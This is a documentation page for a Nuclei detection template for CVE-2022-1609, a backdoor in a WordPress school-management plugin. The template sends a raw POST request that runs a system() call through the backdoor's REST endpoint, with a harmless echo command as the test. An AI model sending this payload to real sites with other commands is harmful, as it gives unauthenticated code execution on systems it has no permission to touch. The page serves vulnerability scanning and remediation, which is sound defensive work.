Skip to content
Nuclei Templates

The School Management < 9.9.7 - Remote Code Execution

ID: CVE-2022-1609

Severity: critical

Author: For3stCo1d

Tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress,weblizar

Description

Section titled “Description”

The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it’s license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.

YAML Source

Section titled “YAML Source”
id: CVE-2022-1609


info:
  name: The School Management < 9.9.7 - Remote Code Execution
  author: For3stCo1d
  severity: critical
  description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade The School Management to version 9.9.7 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
    - https://github.com/nastar-id/WP-school-management-RCE
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/0x007f/cve-2022-1609-exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1609
    cwe-id: CWE-94
    epss-score: 0.11941
    epss-percentile: 0.95204
    cpe: cpe:2.3:a:weblizar:school_management:*:*:*:*:pro:wordpress:*:*
  metadata:
    verified: false
    max-request: 1
    vendor: weblizar
    product: school_management
    framework: wordpress
  tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress,weblizar
variables:
  cmd: "echo CVE-2022-1609 | rev"


http:
  - raw:
      - |
        POST /wp-json/am-member/license HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        blowfish=1&blowf=system('{{cmd}}');


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '9061-2202-EVC'
# digest: 490a004630440220182ae827582c73545728529c34994b88a3d494ba8eb89a3037021d973c01f814022072a27a354f2184f646211d17fe11bdc679f1540506a06f377e84cf3ab98395f0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1609.yaml"

View on Github